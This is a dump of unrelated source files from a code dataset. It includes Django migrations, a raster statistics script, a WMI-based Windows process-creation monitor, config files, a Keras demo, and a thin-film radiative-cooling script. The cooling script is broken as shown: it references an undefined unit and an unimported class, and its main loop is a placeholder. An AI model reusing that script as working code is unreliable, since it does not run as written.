# AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED=True
# HTTPCACHE_EXPIRATION_SECS=0
# HTTPCACHE_DIR='httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES=[]
# HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"denolehov@gmail.com"
] | denolehov@gmail.com |
6bc697c7c1415d81c85e98e2b5884c68a98162f5 | 74ec490a69aff693a2142d69ac0fbdbce5f7c8e9 | /rango/migrations/0003_category_likes.py | ea42ed59540bdfaa6cfbf5a79e9f11d6bab5f91b | [] | no_license | Qastel/tango_with_django_project | 1b0210d97ff58d974f9b915b91abe5747b73afca | adb2198d0473455be8cddb744134fcfb3870bdb6 | refs/heads/master | 2020-12-11T16:45:51.776774 | 2020-02-16T14:22:16 | 2020-02-16T14:22:16 | 233,880,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # Generated by Django 2.1.5 on 2020-02-02 12:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rango', '0002_auto_20200202_1217'),
]
operations = [
migrations.AddField(
model_name='category',
name='likes',
field=models.IntegerField(default=0),
),
]
| [
"constantinrzv@yahoo.com"
] | constantinrzv@yahoo.com |
293d75908a6de5f6498d8ffff4ccfa132ed124cc | 1834f0071e8bfa2c6f4a183517c37d44affe6cd2 | /rasterMM.py | 4dc61d893010a59d9e94af713cb43777f1703eea | [
"MIT"
] | permissive | Bmay531/arcpy-scripts | abdaf1d4ec647f0a388f8bffffe6dcf6fd4eafc5 | 00c4ffadd567eb2cf7d168a166529a86f1a6686c | refs/heads/master | 2020-06-13T06:47:43.288116 | 2014-02-12T17:40:20 | 2014-02-12T17:40:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,859 | py | # -*- coding: utf-8 -*-
# Program: RASTR.MM
# Version: 1.0
# Objective: To determine the max & min values in a raster dataset
# - BEGIN PROGRAM -
# Ascii art and name
print(
r"""
_____ _____ _______ _____ __ __ __ __
| __ \ /\ / ____|__ __| __ \ | \/ | \/ |
| |__) | / \ | (___ | | | |__) | | \ / | \ / |
| _ / / /\ \ \___ \ | | | _ / | |\/| | |\/| |
| | \ \ / ____ \ ____) | | | | | \ \ _| | | | | | |
|_| \_|_/ \_\_____/ |_| |_| \_(_)_| |_|_| |_|
-._ Developed by: Bilal Karim _.-
"""
)
# Main body of code
import os # Import OS module for later use to load appropriate paths, depending on which system is being used
filePath = raw_input("\n Hello, user. " # Provide info/instructions and ask user to input file path
"RASTR.MM lets you determine the MAX and MIN values of your raster dataset."
"\n \n Please type in the path of your raster file and press 'Enter': ")
x = 0 # Set up a file path validation system
while x < 1:
if os.path.exists(filePath): # If file path exists, continue. Otherwise, go to Line 58
x = 1
rasterFile = open(filePath, "r") # Open the file in read mode
data = rasterFile.readlines()[6:] # Read lines in data except for first 6 lines (i.e., skip header information)
check = True # Validation system for later use to determine max & min values
for lines in data:
content = lines.split() # Split lines of data and assign to a new variable
for dNvalue in content:
dNvalue = int(dNvalue) # Convert strings of DN values from data into integers for max & min evaluation
if check == True:
                    max = -1 # Initialize max below the smallest possible DN value (any value read will be larger)
                    min = 255 # Initialize min at the largest possible DN value (any value read will be equal or smaller)
check = False
else:
if dNvalue > max: # Check to see if the currently read value is greater than max (i.e., -1)..
max = dNvalue # ..and keep continuing until the max value is found from the data
if dNvalue < min: # Check to see if the currently read value is less than min (i.e., 255)..
min = dNvalue # ..and keep continuing until the min value is found from the data
print ("\n Oh, hai there!"), ("\n Your maximum value is"), max, # Display max value to user
print ("\n Your minimum value is"), min # Display min value to user
rasterFile.close() # Close the file
else: # If file path does not exist..
raw_input("\n ** ERROR: File does not exist. Press 'Enter' to continue. ** ") # ..display an error message, and..
filePath = raw_input("\n Please type in the path to your raster file and press 'Enter': ") # ..ask the user to input the file path again
print ("\n RASTR.MM will exit in 5 seconds. \n") # Display exit message for users running this program in Command Prompt/Terminal
import time # Import time module..
time.sleep(5) # ..and exit the program in 5 seconds
# - END PROGRAM -
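# Added note: an equivalent (untested) check with numpy, assuming the same Esri ASCII grid
# layout used above (six header lines followed by whitespace-separated DN values):
#
#     import numpy as np
#     grid = np.loadtxt(filePath, skiprows=6)
#     print(grid.max(), grid.min())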
# What’s the most resilient parasite? Bacteria? A virus? An intestinal worm? An idea. Resilient. Highly contagious.
# Once an idea has taken hold of the brain, it is almost impossible to eradicate. An idea that is fully formed..
# ..fully understood - that sticks; right in there somewhere - Dom Cobb (Inception)
| [
"admin@xeenat.com"
] | admin@xeenat.com |
e1329914d8e28fef90cbe19ac30fa6bd6dfe404f | a6f2b86998c97ae55d527ea3d4cf119bf248d519 | /django/rescrap/admin.py | 4d7f244c0a32058e7fe7f482c797aaf588fafe6d | [] | no_license | lspz/REHub | db57e1bf795cc665073bbd8a9db89706647aa271 | 0123381ba613dcf34fe162860349947a88fdcf07 | refs/heads/master | 2020-12-24T13:36:48.405121 | 2014-07-23T03:53:53 | 2014-07-23T03:53:53 | 22,124,131 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | from django.contrib import admin
from .models import *
admin.site.register(ImportBatch)
admin.site.register(Agency)
admin.site.register(Suburb)
admin.site.register(Address)
admin.site.register(Listing) | [
"louis_parengkuan@yahoo.com"
] | louis_parengkuan@yahoo.com |
7bd76114f2db8c0a333d8012d0d09beaa353a5e9 | 3f480f3501840660235917cdbd0e600a0ac5f10c | /Win32Api/ServiceMonitor.py | 0709057236bb9cc5b714ad691c72041ac1dda694 | [] | no_license | ornitorrincco/Low-Level-Python | a11d72e809e62c2450be315a31f4b3f9427f57c6 | cdd1e69ad1e222c5361c5ca9bd5309484775c8c7 | refs/heads/master | 2020-03-14T13:23:15.718120 | 2019-06-06T04:12:47 | 2019-06-06T04:12:47 | 131,631,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | import win32con
import win32api
import win32security
import wmi
import sys
import os
def logToFile(message):
fd = open('Process Monitor Log.csv','ab')
fd.write(bytes(message, encoding= 'utf-8'))
fd.close()
return
# create a log file header
logToFile('Time, User, Executable, CommandLine, PID, Parent PID, Privileges')
# instantiate the WMI interfaces
c = wmi.WMI()
# create our process Monitor TODO(ornitorrincco): is this a function?
processWatcher = c.Win32_Process.watch_for('creation')
while True:
try:
newProcess = processWatcher()
print(newProcess)
processOwner = newProcess.GetOwner()
print(processOwner)
createDate = newProcess.CreationDate
print(createDate)
executable = newProcess.ExecutablePath
print(executable)
cmdline = newProcess.CommandLine
print(cmdline)
pid = newProcess.ProcessId
print(pid)
parentPid = newProcess.ParentProcessId
print(parentPid)
privileges = 'N/A'
        # assemble one CSV record from the values collected above
        print("%s,%s,%s,%s,%s,%s,%s\r\n" % (createDate, "%s\\%s" % (processOwner[0], processOwner[2]), executable, cmdline, pid, parentPid, privileges))
except:
pass
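# Added note: privileges is hard-coded to 'N/A' above. A minimal, untested sketch of how the
# enabled privileges of the new process could be looked up with the pywin32 modules already
# imported in this script (kept as comments so the monitoring loop is unchanged):
#
#     def get_process_privileges(pid):
#         hproc = win32api.OpenProcess(win32con.PROCESS_QUERY_INFORMATION, False, pid)
#         htok = win32security.OpenProcessToken(hproc, win32con.TOKEN_READ)
#         privs = win32security.GetTokenInformation(htok, win32security.TokenPrivileges)
#         names = [win32security.LookupPrivilegeName(None, priv_id)
#                  for priv_id, flags in privs
#                  if flags & win32security.SE_PRIVILEGE_ENABLED]
#         return "|".join(names) or "N/A"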
| [
"ornitorrincco@gmail.com"
] | ornitorrincco@gmail.com |
37f4be96948ac5d8e9f6f8094a2c25c829074819 | 45ee9a6d3ac82043241e96cbf2459e9d3937cd9c | /docs/source/conf.py | b7655eca2423b0fed3ffb8303d889a943a4dc47b | [
"MIT"
] | permissive | ggaughan/django-cities-light | 013f83e870e2f3eaf1ba93e212d83956b8b060a9 | bdd22248c7934d912b8e763360c132da2c794e27 | refs/heads/master | 2021-01-18T00:05:26.502029 | 2013-11-22T20:50:27 | 2013-11-22T20:50:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,421 | py | # -*- coding: utf-8 -*-
#
# django-cities-light documentation build configuration file, created by
# sphinx-quickstart on Sat May 19 19:32:33 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os, sys, os.path
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../../../../lib/python2.7/site-packages/'))
from django.conf import settings
settings.configure()
autoclass_content = "both"
import os
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if on_rtd:
intersphinx_mapping = {
'autocompletelight': ('http://django-autocomplete-light.readthedocs.org/en/latest/', None),
}
else:
intersphinx_mapping = {
'autocompletelight': ('file:///home/jpic/env/src/autocomplete-light/docs/build/html/', None),
}
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode', 'sphinx.ext.intersphinx']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'django-cities-light'
copyright = u'2012, James Pic'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2.1'
# The full version, including alpha/beta/rc tags.
release = '2.1.5'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-cities-lightdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-cities-light.tex', u'django-cities-light Documentation',
u'James Pic', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-cities-light', u'django-cities-light Documentation',
[u'James Pic'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-cities-light', u'django-cities-light Documentation',
u'James Pic', 'django-cities-light', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| [
"jamespic@gmail.com"
] | jamespic@gmail.com |
5c72f6af9b24225574fd7870da492dad430f396d | d4d9323ae998fdb08729e6b4ea5860bd8f35edbd | /koroviev/massey_ranking.py | 2e8656ee3f8836b8e5bdb2948d318a648ee57810 | [] | no_license | jaspajjr/koroviev | abb7216602b18ffd0b51cd2ef53d7fe1bfa1a13a | 43de78e5db7c8b4411cc168ea551e691e781b402 | refs/heads/master | 2020-12-25T13:34:27.800852 | 2016-07-17T22:24:01 | 2016-07-17T22:24:01 | 63,483,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 65 | py | import pandas as pd
import numpy as np
def main():
return 1
| [
"jaspajr@gmail.com"
] | jaspajr@gmail.com |
2c3a637d4f4e3eff8d66367b9ef348f382db4bf5 | 687d41506e151a4c92150d2625ade29cdfffd233 | /pycasino/cli.py | e24a7eb85f3e08f288bbc59bff69d5d66c116ebf | [
"MIT"
] | permissive | pblankenau2/pycasino | 3022dafcc47be7e2f365e767239fdd0dd9cdc807 | ca0fc95dae9a15789262ca3b3396c853fed3f3ea | refs/heads/master | 2020-03-20T18:53:02.957380 | 2020-03-01T00:37:45 | 2020-03-01T00:37:45 | 137,609,339 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,555 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import click
import yaml
import click_config_file
from .roulette import model
from .roulette import player
from .roulette import wheel_builder
def player_factory(player_name, **kwargs):
"""
kwargs will contain all the params necessary to initialize the player
"""
return player.REGISTERED_PLAYERS[player_name](**kwargs)
def read_config(filepath, cmd_name):
with open(filepath) as config_data:
return yaml.safe_load(config_data)[cmd_name]
@click.group()
def main():
"""Collects statistics about the outcomes of using particular betting
strategies in different games. This is not a simulation where you play
the game yourself. Instead, you select your game, a player that
will play with a certain betting strategy and the number of game sessions
    that player should play. A player's session is limited by his/her stake
and a maximum number of rounds to play. These can be modified in a
configuration file.
"""
pass
@main.command()
@click.option(
"--num-games",
"-n",
default=50,
show_default=True,
help="The number of games to play.",
)
@click.option(
"--stake", "-s", default=100.0, show_default=True, help="The players initial funds."
)
@click.option(
"--max-rounds",
default=20,
show_default=True,
help="The maximum # of rounds per game.",
)
@click.option(
"--base-bet-amount",
default=20.0,
show_default=True,
help="The initial bet amount (strategies modify following bets amounts).",
)
@click.option(
"--table-limit",
default=350.0,
show_default=True,
help="The maximum amount a bet can be.",
)
@click_config_file.configuration_option(provider=read_config, implicit=False)
@click.argument(
"player",
type=click.Choice(player.REGISTERED_PLAYERS.keys(), case_sensitive=False),
nargs=1,
)
def roulette(player, stake, base_bet_amount, max_rounds, table_limit, num_games):
player_args = {
"stake": stake,
"base_bet_amount": base_bet_amount,
"rounds": max_rounds,
}
game = model.Game(
table=model.Table(table_limit), wheel=wheel_builder.create_wheel()
)
sim = model.Simulator(
game=game, player=player_factory(player_name=player, **player_args)
)
sim.gather(num_games)
click.echo("maximum_stake, rounds_played")
for i in zip(sim.maxima, sim.durations):
click.echo(f"{i[0]}, {i[1]}")
return 0
if __name__ == "__main__":
sys.exit(main())
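# Added note: a hypothetical invocation and YAML config for the command defined above.
# "martingale" is a placeholder player name -- valid names come from
# player.REGISTERED_PLAYERS, which is defined outside this file. Assuming the package
# exposes a "pycasino" console entry point:
#
#     $ pycasino roulette martingale --num-games 100 --stake 250
#
#     # config.yml (passed via the --config option added by click_config_file);
#     # read_config() looks up the section named after the command:
#     roulette:
#       stake: 250.0
#       base_bet_amount: 10.0
#       max_rounds: 50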
| [
"pblankenau@msn.com"
] | pblankenau@msn.com |
1cb30c9e269871d07348485c6437fce3c01a5415 | c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce | /flask/flaskenv/Lib/site-packages/pip/_vendor/msgpack/fallback.py | dd93d22d4040925980e877b62a2e0b299673c4bd | [] | no_license | AhsonAslam/webapi | 54cf7466aac4685da1105f9fb84c686e38f92121 | 1b2bfa4614e7afdc57c9210b0674506ea70b20b5 | refs/heads/master | 2020-07-27T06:05:36.057953 | 2019-09-17T06:35:33 | 2019-09-17T06:35:33 | 208,895,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:f85297381085e0252cf5010ea8096cb08f88640d230516b6ed589e1429e0302e
size 37491
| [
"github@cuba12345"
] | github@cuba12345 |
74a704f681b93a13fcefd0e75f7e187f41461e42 | 89fd759f9dd96367979f8ee68e0f1ae295de2420 | /gui/matplotlib_canvas.py | ef57010d5e978ce9f93e13adac12413e2171cd0b | [] | no_license | lars-frogner/Vortek-C | a92390a90b1d533db7e274404c575606cc889244 | 44c405ca6be0b02c1d5bd734944e225e5f8125dc | refs/heads/master | 2022-09-26T03:59:06.808248 | 2022-08-09T22:41:18 | 2022-08-09T22:41:18 | 170,867,708 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 799 | py | import matplotlib
matplotlib.use('Qt5Agg')
from PySide2 import QtCore, QtWidgets
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
class MatplotlibCanvas(FigureCanvas):
def __init__(self, parent=None, width=6, height=4, dpi=100, edgecolor='k', linewidth=1.0, tight_layout=True):
self.fig = Figure(figsize=(width, height), dpi=dpi, edgecolor=edgecolor, linewidth=linewidth, tight_layout=tight_layout)
self.axes = self.fig.add_subplot(111)
FigureCanvas.__init__(self, self.fig)
self.setParent(parent)
FigureCanvas.setSizePolicy(self, QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Expanding)
FigureCanvas.updateGeometry(self)
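# Added note: a minimal usage sketch, assuming a standalone PySide2 application.
# MatplotlibCanvas is a QWidget, so it can also be placed inside any layout:
#
#     from PySide2 import QtWidgets
#     app = QtWidgets.QApplication([])
#     canvas = MatplotlibCanvas(width=6, height=4, dpi=100)
#     canvas.axes.plot([0, 1, 2], [2, 1, 3])
#     canvas.show()
#     app.exec_()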
| [
"lars_frogner@hotmail.com"
] | lars_frogner@hotmail.com |
fbdf9d45ae1f1d3857f5d20f6637a2b22390646e | 115ccf6174c97707558b3a23cc5915f0975e2168 | /predict_classes.py | ec1209cc1463548d72dc5c5b609a0e1b389bdf42 | [
"MIT"
] | permissive | nanohop/keras_neural_network | c78ff89ec1c7794968cd14f0509279b92654d48c | b0eed70c1c8d0f09eb03b72a3ed2acf8ba7465a1 | refs/heads/master | 2020-03-22T22:26:24.247623 | 2018-07-31T19:22:18 | 2018-07-31T19:22:18 | 140,751,856 | 9 | 7 | MIT | 2018-07-15T19:09:59 | 2018-07-12T18:41:44 | Python | UTF-8 | Python | false | false | 820 | py | import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Activation
model = Sequential()
model.add(Dense(8, activation='relu', input_dim=4))
model.add(Dense(16, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(
optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy']
)
data = np.genfromtxt('high_low.csv', delimiter=',')
x_train = data[1:, :4]
y_train = data[1:, 4]
model.fit(
x_train,
y_train,
epochs=100,
validation_split=0.2
)
x_predict = np.array([
[10, 25, 14, 9],
[102, 100, 75, 90]
])
output = model.predict_classes(x_predict)
print("")
print(output)
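
# Added note: model.predict_classes() was removed in later Keras/TensorFlow releases.
# For this single sigmoid output the equivalent is to threshold the raw predictions
# at 0.5 (reusing the model and x_predict defined above):
probabilities = model.predict(x_predict)
print((probabilities > 0.5).astype("int32"))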
| [
"chrisachard@gmail.com"
] | chrisachard@gmail.com |
a685b2dfb0378748b35a2cf67a13bd6213a93ce7 | 87646b1128f7cd914cc2dd0e3374c30f74047b09 | /untitled0.py | 0859727b2a0c39a132cac10c09b5a3e38ac45796 | [
"MIT"
] | permissive | parkerwray/tmm | 9c9935dc490f3b580ec477680379d5d236766380 | 8c27a56163d33de5955611eee35864c4485d1b2b | refs/heads/master | 2020-05-07T10:55:13.288850 | 2019-12-24T23:59:19 | 2019-12-24T23:59:19 | 180,438,812 | 0 | 0 | MIT | 2019-04-09T19:49:29 | 2019-04-09T19:49:28 | null | UTF-8 | Python | false | false | 4,526 | py |
from __future__ import division, print_function, absolute_import
#from tmm.tmm_core import (coh_tmm, unpolarized_RT, ellips,
# position_resolved, find_in_structure_with_inf)
from wptherml.wptherml.datalib import datalib
import tmm.tmm_core as tmm
import numpy as np
from numpy import linspace, inf, pi, stack, array, real, imag
import matplotlib.pyplot as plt
import matplotlib as mplib
from scipy.interpolate import interp1d, InterpolatedUnivariateSpline
import scipy.io as sio
#%%
# GET EFFECTIVE INDEX DATA FROM BRUGGEMAN APPROXIMATION
# GET DATA FOR SIO2 AND SIN OVER DENSE WAVELENGTH RANGE
nm = 1e-9
lda = linspace(200,30000,10000) # list of wavelengths in nm
ff = np.array([0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100])/100;
m_sio2 = np.zeros((len(lda),len(ff)+1), dtype = np.complex64);
for idx in range(0,len(ff)):
m_sio2[:,idx] = datalib.alloy(lda*nm, ff[idx], 'Air','SiO2','Bruggeman')
m_sio2[:,-1] = lda
m_sin = np.zeros((len(lda),len(ff)+1), dtype = np.complex64);
for idx in range(0,len(ff)):
m_sin[:,idx] = datalib.alloy(lda*nm, ff[idx], 'Air','SiN','Bruggeman')
m_sin[:,-1] = lda
sio.savemat('SiO2_Brugg_FF_0_5_100_lda.mat', {'m_sio2': m_sio2})
sio.savemat('SiN_Brugg_FF_0_5_100_lda.mat', {'m_sin': m_sin})
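# Added note: the saved arrays can be read back for a quick check with scipy, e.g.:
#
#     check = sio.loadmat('SiO2_Brugg_FF_0_5_100_lda.mat')['m_sio2']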
#%%
structure_sio2_sin = {
### computation mode - inline means the structure and calculation
### type will be determined from the values of this dictionary
'mode': 'Inline',
### temperature of the structure - relevant for all thermal applications
### value is stored in attribute self.T
'Temperature': 300,
### actual materials the structure is made from
### values are stored in the attribute self.n
#'Material_List': ['Air','SiO2', 'SiO2','Si3N4','Ag', 'Air'],
'Material_List': ['Air', 'SiO2', 'Si3N4', 'Ag', 'Air'],
### thickness of each layer... terminal layers must be set to zero
### values are stored in attribute self.d
'Thickness_List': [0, 100, 100, 1000, 0], # You can not have the back reflector as the last layer!!!
### range of wavelengths optical properties will be calculated for
### values are stored in the array self.lam
'Lambda_List': [250*nm, 30*um, 10000],
## Calculate for explicit angular dependence
'EXPLICIT_ANGLE': 1,
## Calculate quantities related to radiative cooling
'COOLING': 1
}
# Copy the structure dict before modifying it; a plain assignment would alias the same
# object, so both slabs would end up with the SiN-first material ordering.
structure_sin_sio2 = dict(structure_sio2_sin)
structure_sin_sio2['Material_List'] = ['Air', 'Si3N4', 'SiO2', 'Ag', 'Air']

# NOTE: 'multilayer' is not imported in this script; it is assumed to be provided by the
# wptherml package imported at the top of the file.
slab_sio2_sin = multilayer(structure_sio2_sin)
slab_sin_sio2 = multilayer(structure_sin_sio2)
H = np.linspace(100, 5000, num = 50)
T = np.array([300, 290, 280, 270, 260, 250])
FF = np.array([0,5,10,15,20,25,30,35,40,45,50,55,60,65,70,75,80,85,90,95,100])/100;
P_cool_sio2_sin = np.zeros((len(T),len(H),len(H)))
P_cool_sin_sio2 = np.zeros((len(T),len(H),len(H)))
P_cool_sio2_sin_np = np.zeros((len(T),len(H),len(H),len(FF)))
P_cool_sin_sio2_np = np.zeros((len(T),len(H),len(H),len(FF)))
for idx_T in range(0,len(T)):
for idx_L1 in range(0,len(H)):
for idx_L2 in range(0,len(H)):
            for idx_ff in range(0,len(FF)):
                pass  # placeholder body: the per-combination cooling-power calculation was left unwritten
#%%
## Change one of the layers to an effective index
#fill_fraction = 0.3
#layer = 1
#np_slab.layer_alloy(layer,fill_fraction,'Air','Si3N4','Bruggeman', plot = False)
##np_slab.layer_alloy(layer,fill_fraction,'Air','Si3N4','MG', plot = False)
#layer = 2
#np_slab.layer_alloy(layer,fill_fraction,'Air','SiO2','Bruggeman', plot = False)
#np_slab.fresnel() # You need to update the fresnel Quantities to reflect the effective index change.
#np_slab.fresnel_ea()
#
#elements = 80
#temp = np.linspace(219,450,elements)
#rad_pow = np.zeros([elements,elements])
#sol_pow = np.zeros([elements,elements])
#at_pow = np.zeros([elements,elements])
#cool_pow = np.zeros([elements,elements])
#
#for idx0 in range(0,elements):
# for idx1 in range(0,elements):
# np_slab.T_ml = temp[idx0]
# np_slab.T_amb = temp[idx1]
#
# #np_slab.thermal_emission()
# np_slab.thermal_emission_ea()
# np_slab.cooling_power()
# BB = datalib.BB(np_slab.lambda_array, np_slab.T_ml)
#
# rad_pow[idx0][idx1] = np_slab.radiative_power_val
# sol_pow[idx0][idx1] = np_slab.solar_power_val
# at_pow[idx0][idx1] = np_slab.atmospheric_power_val
# cool_pow[idx0][idx1] = np_slab.cooling_power_val
| [
"pwray@caltech.edu"
] | pwray@caltech.edu |
b2fb7e9429aba97f24de724038516d82b01d2628 | c35b1d9dd99c7b0ad3e8bee3293df7042f9ae39a | /flatpages_plus/migrations/0006_auto__add_field_flatpage_photo.py | aafdf685ac68e4d45ca808587c1bf1d9451669dc | [
"MIT"
] | permissive | grengojbo/django-flatpages-plus | 467b2e82d3f2d3c71629ddab5288e1416e5ddeda | 29af987565dd4c87fa3b0751105b5521e2690374 | refs/heads/master | 2020-12-24T20:42:23.064557 | 2014-03-02T17:29:22 | 2014-03-02T17:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,533 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FlatPage.photo'
db.add_column('flatpages_plus_flatpage', 'photo',
self.gf('sorl.thumbnail.fields.ImageField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FlatPage.photo'
db.delete_column('flatpages_plus_flatpage', 'photo')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
